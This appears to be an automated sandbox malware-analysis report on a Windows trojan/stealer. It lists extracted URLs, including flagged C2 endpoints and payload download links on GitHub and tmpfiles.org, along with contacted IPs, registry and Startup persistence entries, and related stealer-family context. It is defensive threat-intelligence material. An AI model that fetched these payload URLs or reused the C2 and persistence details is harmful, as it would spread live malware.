https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chromecache_192.16.dr	false		high
http://185.215.113.206/6c4adf523b719729.php/u	0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://thumbystriw.store:443/api	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pohtent2.exe, 00000007.00000002.2424020147.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/ocal	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/14436606/23354	pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://presticitpo.store:443/api	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/_/og/promos/	chromecache_192.16.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exeM	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/off/random.exeb	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.mic	2090621607.exe, 00000038.00000003.2787979264.00000000058FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	2090621607.exe, 00000038.00000003.2727286266.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937533627.0000000001006000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937713395.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937466911.0000000001047000.00000004.00000020.00020000.00000000.sdmp	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_193.16.dr	false		high
https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Google	2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe=	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://crisiwarny.store/	2090621607.exe, 00000038.00000002.3027024106.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727527963.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tmpfiles.org/dl/15309322/pohtent2.exe21	skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://founpiuer.store/apistr	2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncodedE	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpY	skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-netJ	pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en/about/products	chromecache_192.16.dr	false		high
https://docs.rs/getrandom#nodejs-es-module-support	0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/log?format=json&hasfast=true	chromecache_193.16.dr	false		high
https://lens.google.com	chromecache_193.16.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpM	skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schema.org/WebPage	chromecache_192.16.dr	false		high
https://ogs.google.com/widget/callout?prid=19040333	chromecache_192.16.dr	false		high
https://tmpfiles.org/dl/15309322/pohtent2.exeV	skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php4	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php4553001	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://crisiwarny.store:443/api	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/lcreport/	chromecache_193.16.dr	false		high
https://stackoverflow.com/q/11564914/23354;	pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exeX	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://founpiuer.store/e/n	2090621607.exe, 0000005F.00000003.2937713395.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/6c4adf523b719729.phpR	0717674af5.exe, 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	chromecache_192.16.dr	false		high
http://185.215.113.16/off/random.exec61395d7f	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://founpiuer.store/bool	2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://necklacedmny.store:443/api	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lensfrontend-pa.clients6.google.com/v1/crupload	chromecache_193.16.dr	false		high
http://tmpfiles.org/dl/15309322/pohtent2.exeex	skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ogs.google.com/widget/app/so?eom=1	chromecache_192.16.dr	false		high
https://support.google.com/websearch/answer/106230	chromecache_193.16.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.67.133.135	founpiuer.store	United States	13335	CLOUDFLARENETUS	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
172.67.195.247	tmpfiles.org	United States	13335	CLOUDFLARENETUS	false
172.240.127.234	trashycontinuousbubbly.com	United States	7979	SERVERS-COMUS	false
162.230.48.189	unknown	United States	7018	ATT-INTERNET4US	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550787
Start date and time:	2024-11-07 07:31:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	160
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lIocM276SA.exe renamed because original name is a hash value
Original Sample Name:	ed91fed1365af41a389141266378cfc8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@495/29@21/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 52% Number of executed functions: 400 Number of non-executed functions: 81
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.181.227, 142.250.185.174, 142.251.173.84, 34.104.35.123, 142.250.184.195, 142.250.185.67, 142.250.184.227
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:33:01	API Interceptor	2111x Sleep call for process: skotes.exe modified
01:33:22	API Interceptor	171x Sleep call for process: InstallUtil.exe modified
01:33:42	API Interceptor	48x Sleep call for process: 2090621607.exe modified
01:33:58	API Interceptor	41x Sleep call for process: 0717674af5.exe modified
06:31:57	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
06:33:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs
06:33:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2090621607.exe C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe
06:33:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0717674af5.exe C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe
06:33:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4477947f1f.exe C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe
06:34:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2090621607.exe C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe
06:34:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0717674af5.exe C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe
06:34:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4477947f1f.exe C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
172.67.133.135	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tmpfiles.org	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.16
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	104.21.21.16
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	104.21.21.16
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.21.16
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	104.21.21.16
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse	104.21.21.16
	https://aeindo.co.id/cvt/	Get hash	malicious	Unknown	Browse	104.21.21.16
founpiuer.store	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
trashycontinuousbubbly.com	file.exe	Get hash	malicious	PureCrypter	Browse	172.240.127.234
	file.exe	Get hash	malicious	PureCrypter	Browse	172.240.108.68
	file.exe	Get hash	malicious	PureCrypter	Browse	192.243.61.227
	file.exe	Get hash	malicious	PureCrypter	Browse	172.240.127.234

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.5.155
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	104.21.28.76
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	1.13.38.145
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	https://www.wallpaperflare.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	2pKmZ1M9Je.pdf	Get hash	malicious	HTMLPhisher	Browse	104.19.229.21
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.5.155
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	104.21.28.76
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	1.13.38.145
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	https://www.wallpaperflare.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	2pKmZ1M9Je.pdf	Get hash	malicious	HTMLPhisher	Browse	104.19.229.21
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://eu2.contabostorage.com/0f057bf4d91340d3ae18d5f31372fa7e:caldev/doc.html#dloplcemeteryoversight-labor@maryland.gov	Get hash	malicious	HTMLPhisher	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	https://www.wallpaperflare.com/	Get hash	malicious	Unknown	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	PureCrypter	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	2pKmZ1M9Je.pdf	Get hash	malicious	HTMLPhisher	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	PureCrypter	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	505TW85087.htm	Get hash	malicious	Unknown	Browse	172.202.163.200 184.28.90.27 13.107.246.45
	g7TubE2bYo.exe	Get hash	malicious	Stealc, Vidar	Browse	172.202.163.200 184.28.90.27 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.133.135
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	SecuriteInfo.com.Win32.Evo-gen.14915.21522.exe	Get hash	malicious	LummaC	Browse	172.67.133.135
